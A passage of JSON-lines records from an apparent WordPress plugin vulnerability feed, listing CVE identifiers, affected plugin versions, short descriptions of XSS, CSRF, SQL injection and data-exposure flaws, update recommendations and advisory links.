version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/dbarproductions\\\/pta-volunteer-sign-up-sheets\\\/archive\\\/refs\\\/tags\\\/5.5.5.zip\",\"name\":\"https:\\\/\\\/github.com\\\/dbarproductions\\\/pta-volunteer-sign-up-sheets\\\/archive\\\/refs\\\/tags\\\/5.5.5.zip\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/pta-volunteer-sign-up-sheets\\\/vulnerability\\\/wordpress-volunteer-sign-up-sheets-plugin-5-5-5-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/pta-volunteer-sign-up-sheets\\\/vulnerability\\\/wordpress-volunteer-sign-up-sheets-plugin-5-5-5-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3718","slug":"the-plus-addons-for-elementor-page-builder","versionImpact":"5.5.4","versionEndExcluding":"5.5.5","description":"The The Plus Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several of the plugin's widgets all versions up to, and including, 5.5.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.5.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1b73402b-444c-47ad-9c05-7be6e6440123?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1b73402b-444c-47ad-9c05-7be6e6440123?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.4.2\\\/modules\\\/widgets\\\/tp_progress_bar.php#L1161\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.4.2\\\/modules\\\/widgets\\\/tp_progress_bar.php#L1161\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.4.2\\\/modules\\\/widgets\\\/tp_age_gate.php#L2304\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.4.2\\\/modules\\\/widgets\\\/tp_age_gate.php#L2304\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.4.2\\\/modules\\\/widgets\\\/tp_header_extras.php#L2757\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.4.2\\\/modules\\\/widgets\\\/tp_header_extras.php#L2757\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.4.2\\\/modules\\\/widgets\\\/tp_scroll_navigation.php#L1143\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.4.2\\\/modules\\\/widgets\\\/tp_scroll_navigation.php#L1143\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.4.2\\\/modules\\\/widgets\\\/tp_pricing_table.php#L2869\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.4.2\\\/modules\\\/widgets\\\/tp_pricing_table.php#L2869\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.4.2\\\/modules\\\/widgets\\\/tp_flip_box.php#L2349\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.4.2\\\/modules\\\/widgets\\\/tp_flip_box.php#L2349\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.4.2\\\/modules\\\/widgets\\\/tp_hovercard.php#L2648\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.4.2\\\/modules\\\/widgets\\\/tp_hovercard.php#L2648\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090866\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090866\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2784","slug":"the-plus-addons-for-elementor-page-builder","versionImpact":"5.5.4","versionEndExcluding":"5.5.5","description":"The The Plus Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Hover Card widget in all versions up to, and including, 5.5.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.5.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cc6fdb7c-b750-4f03-9785-a9dc7573580d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cc6fdb7c-b750-4f03-9785-a9dc7573580d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090866\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090866\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12115","slug":"poll-maker","versionImpact":"5.5.4","versionEndExcluding":"5.5.5","description":"The Poll Maker \u2013 Versus Polls, Anonymous Polls, Image Polls plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.5.4. This is due to missing or incorrect nonce validation on the duplicate_poll() function. This makes it possible for unauthenticated attackers to duplicate polls via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 5.5.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202972\\\/poll-maker\\\/tags\\\/5.5.5\\\/includes\\\/lists\\\/class-poll-maker-polls-list-table.php?old=3202972&old_path=poll-maker%2Ftags%2F5.5.4%2Fincludes%2Flists%2Fclass-poll-maker-polls-list-table.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202972\\\/poll-maker\\\/tags\\\/5.5.5\\\/includes\\\/lists\\\/class-poll-maker-polls-list-table.php?old=3202972&old_path=poll-maker%2Ftags%2F5.5.4%2Fincludes%2Flists%2Fclass-poll-maker-polls-list-table.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e76447ec-2815-4758-ae2c-67a938a739d9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e76447ec-2815-4758-ae2c-67a938a739d9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13602","slug":"poll-maker","versionImpact":"5.5.3","versionEndExcluding":"5.5.4","description":"The Poll Maker  WordPress plugin before 5.5.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 5.5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/05d5010b-94eb-4fd3-b962-e2a16c032b71\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/05d5010b-94eb-4fd3-b962-e2a16c032b71\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-45810","slug":"email-subscribers","versionEndExcluding":"5.5.3","description":"Improper Neutralization of Formula Elements in a CSV File vulnerability in Icegram Icegram Express \u2013 Email Marketing, Newsletters and Automation for WordPress & WooCommerce.This issue affects Icegram Express \u2013 Email Marketing, Newsletters and Automation for WordPress & WooCommerce: from n\/a through 5.5.2.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/email-subscribers\\\/wordpress-icegram-express-email-subscribers-newsletters-and-marketing-automation-plugin-plugin-5-5-2-csv-injection?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/email-subscribers\\\/wordpress-icegram-express-email-subscribers-newsletters-and-marketing-automation-plugin-plugin-5-5-2-csv-injection?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3714","slug":"profilegrid-user-profiles-groups-and-communities","versionEndExcluding":"5.5.3","description":"The ProfileGrid plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'edit_group' handler in versions up to, and including, 5.5.2. This makes it possible for authenticated attackers, with group ownership, to update group options, including the 'associate_role' parameter, which defines the member's role. This issue was partially patched in version 5.5.2 preventing privilege escalation, however, it was fully patched in 5.5.3.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/tags\\\/5.4.8\\\/public\\\/partials\\\/profile-magic-group.php#L80\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/tags\\\/5.4.8\\\/public\\\/partials\\\/profile-magic-group.php#L80\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2938904\\\/profilegrid-user-profiles-groups-and-communities#file4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2938904\\\/profilegrid-user-profiles-groups-and-communities#file4\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2939344\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/public\\\/partials\\\/profile-magic-group.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2939344\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/public\\\/partials\\\/profile-magic-group.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4766651-92a6-42c9-81bc-7ea25350f561?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4766651-92a6-42c9-81bc-7ea25350f561?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4485","slug":"the-plus-addons-for-elementor-page-builder","versionImpact":"5.5.2","versionEndExcluding":"5.5.3","description":"The The Plus Addons for Elementor \u2013 Elementor Addons, Page Templates, Widgets, Mega Menu, WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018button_custom_attributes\u2019 parameter in versions up to, and including, 5.5.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.5.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4890cd48-a448-4af1-ae1e-6456300434e5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4890cd48-a448-4af1-ae1e-6456300434e5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.5.2\\\/modules\\\/widgets\\\/tp_button.php#L1538\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.5.2\\\/modules\\\/widgets\\\/tp_button.php#L1538\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083932\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083932\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4484","slug":"the-plus-addons-for-elementor-page-builder","versionImpact":"5.5.1","versionEndExcluding":"5.5.3","description":"The The Plus Addons for Elementor \u2013 Elementor Addons, Page Templates, Widgets, Mega Menu, WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018xai_username\u2019 parameter in versions up to, and including, 5.5.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.5.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f36c785f-9b8c-43c4-b12f-6fb4c0c67eff?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f36c785f-9b8c-43c4-b12f-6fb4c0c67eff?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.5.2\\\/modules\\\/widgets\\\/tp_meeting_scheduler.php#L549\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.5.2\\\/modules\\\/widgets\\\/tp_meeting_scheduler.php#L549\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083932\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083932\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12428","slug":"wp-data-access","versionImpact":"5.5.22","versionEndExcluding":"5.5.23","description":"The WP Data Access \u2013 App, Table, Form and Chart Builder plugin plugin for WordPress is vulnerable to SQL Injection via the 'order[user_login][dir]' parameter in all versions up to, and including, 5.5.22 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 5.5.23, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3210150\\\/wp-data-access\\\/tags\\\/5.5.23\\\/WPDataAccess\\\/Data_Tables\\\/WPDA_Data_Tables.php?old=3206494&old_path=wp-data-access%2Ftags%2F5.5.22%2FWPDataAccess%2FData_Tables%2FWPDA_Data_Tables.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3210150\\\/wp-data-access\\\/tags\\\/5.5.23\\\/WPDataAccess\\\/Data_Tables\\\/WPDA_Data_Tables.php?old=3206494&old_path=wp-data-access%2Ftags%2F5.5.22%2FWPDataAccess%2FData_Tables%2FWPDA_Data_Tables.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a1708d6e-14f5-418f-81eb-f9269159b5b1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a1708d6e-14f5-418f-81eb-f9269159b5b1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12743","slug":"mailpoet","versionImpact":"5.5.1","versionEndExcluding":"5.5.2","description":"The MailPoet  WordPress plugin before 5.5.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 5.5.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7945f52d-364d-438c-84f2-cf19b4250056\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7945f52d-364d-438c-84f2-cf19b4250056\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5209","slug":"add-search-to-menu","versionImpact":"5.5.9","versionEndExcluding":"5.5.10","description":"The Ivory Search  WordPress plugin before 5.5.10 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed","recommendation":"Update to version 5.5.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8b51dc46-62c8-45b5-96ce-fb774b430388\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8b51dc46-62c8-45b5-96ce-fb774b430388\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2785","slug":"the-plus-addons-for-elementor-page-builder","versionImpact":"5.4.2","versionEndExcluding":"5.5.0","description":"The The Plus Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Age Gate widget in all versions up to, and including, 5.4.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3076733%40the-plus-addons-for-elementor-page-builder&new=3076733%40the-plus-addons-for-elementor-page-builder&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3076733%40the-plus-addons-for-elementor-page-builder&new=3076733%40the-plus-addons-for-elementor-page-builder&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.5.0\\\/modules\\\/widgets\\\/tp_age_gate.php?annotate=blame#L2389\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.5.0\\\/modules\\\/widgets\\\/tp_age_gate.php?annotate=blame#L2389\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0117436-7a2a-42f3-8c05-75dfddfb9d09?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0117436-7a2a-42f3-8c05-75dfddfb9d09?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0445","slug":"the-plus-addons-for-elementor-page-builder","versionImpact":"5.4.2","versionEndExcluding":"5.5.0","description":"The The Plus Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's element attributes in all versions up to, and including, 5.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor access or higher to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. CVE-2024-34373 is likely a duplicate of this issue.","recommendation":"Update to version 5.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.5.0\\\/modules\\\/widgets\\\/tp_info_box.php#L2997\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.5.0\\\/modules\\\/widgets\\\/tp_info_box.php#L2997\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.5.0\\\/modules\\\/widgets\\\/tp_flip_box.php#L2388\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.5.0\\\/modules\\\/widgets\\\/tp_flip_box.php#L2388\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.5.0\\\/modules\\\/widgets\\\/tp_pricing_table.php#L2960\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.5.0\\\/modules\\\/widgets\\\/tp_pricing_table.php#L2960\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.3.4\\\/modules\\\/widgets\\\/tp_info_box.php#L2928\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.3.4\\\/modules\\\/widgets\\\/tp_info_box.php#L2928\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.3.4\\\/modules\\\/widgets\\\/tp_flip_box.php#L2323\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.3.4\\\/modules\\\/widgets\\\/tp_flip_box.php#L2323\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.3.4\\\/modules\\\/widgets\\\/tp_pricing_table.php#L2942\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.3.4\\\/modules\\\/widgets\\\/tp_pricing_table.php#L2942\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a412e682-869a-46ba-a2d0-d84ed542adc9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a412e682-869a-46ba-a2d0-d84ed542adc9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3199","slug":"the-plus-addons-for-elementor-page-builder","versionImpact":"5.4.2","versionEndExcluding":"5.5.0","description":"The The Plus Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the countdown widget in all versions up to, and including, 5.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab15fe2b-974c-41b0-ab6b-68322d2d3396?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab15fe2b-974c-41b0-ab6b-68322d2d3396?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.4.2\\\/modules\\\/widgets\\\/tp_countdown.php#L1781\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.4.2\\\/modules\\\/widgets\\\/tp_countdown.php#L1781\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3056776%40the-plus-addons-for-elementor-page-builder%2Ftags%2F5.4.2&new=3076733%40the-plus-addons-for-elementor-page-builder%2Ftags%2F5.5.0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3056776%40the-plus-addons-for-elementor-page-builder%2Ftags%2F5.4.2&new=3076733%40the-plus-addons-for-elementor-page-builder%2Ftags%2F5.5.0\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3197","slug":"the-plus-addons-for-elementor-page-builder","versionImpact":"5.4.2","versionEndExcluding":"5.5.0","description":"The The Plus Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via custom attributes in the plugin's widgets in all versions up to, and including, 5.4.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af650c7a-c413-4f4a-9e4b-8ddcd8da5397?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af650c7a-c413-4f4a-9e4b-8ddcd8da5397?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3056776%40the-plus-addons-for-elementor-page-builder%2Ftags%2F5.4.2&new=3076733%40the-plus-addons-for-elementor-page-builder%2Ftags%2F5.5.0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3056776%40the-plus-addons-for-elementor-page-builder%2Ftags%2F5.4.2&new=3076733%40the-plus-addons-for-elementor-page-builder%2Ftags%2F5.5.0\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13640","slug":"woocommerce-delivery-notes","versionImpact":"5.4.1","versionEndExcluding":"5.5.0","description":"The Print Invoice & Delivery Notes for WooCommerce plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 5.4.1 via the 'wcdn\/invoice' directory. This makes it possible for unauthenticated attackers to extract sensitive data stored insecurely in the \/wp-content\/uploads\/wcdn\/invoice directory which can contain invoice files if an email attachment setting is enabled.","recommendation":"Update to version 5.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-delivery-notes\\\/trunk\\\/includes\\\/class-wcdn-theme.php#L56\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-delivery-notes\\\/trunk\\\/includes\\\/class-wcdn-theme.php#L56\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250195\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250195\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12ab3e54-a0b9-4420-ac90-f16e23688cca?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12ab3e54-a0b9-4420-ac90-f16e23688cca?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-49312","slug":"rss-feed-post-generator-echo","versionImpact":"5.4.8.1","versionEndExcluding":"5.4.9","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CodeRevolution Echo RSS Feed Post Generator Plugin for WordPress allows Reflected XSS. This issue affects Echo RSS Feed Post Generator Plugin for WordPress: from n\/a through 5.4.8.1.","recommendation":"Update to version 5.4.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/rss-feed-post-generator-echo\\\/vulnerability\\\/wordpress-echo-rss-feed-post-generator-plugin-for-wordpress-plugin-5-4-8-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/rss-feed-post-generator-echo\\\/vulnerability\\\/wordpress-echo-rss-feed-post-generator-plugin-for-wordpress-plugin-5-4-8-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
